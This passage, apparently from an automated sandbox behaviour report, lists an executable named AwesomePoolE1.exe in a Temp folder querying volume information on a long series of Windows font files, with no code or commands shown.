            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
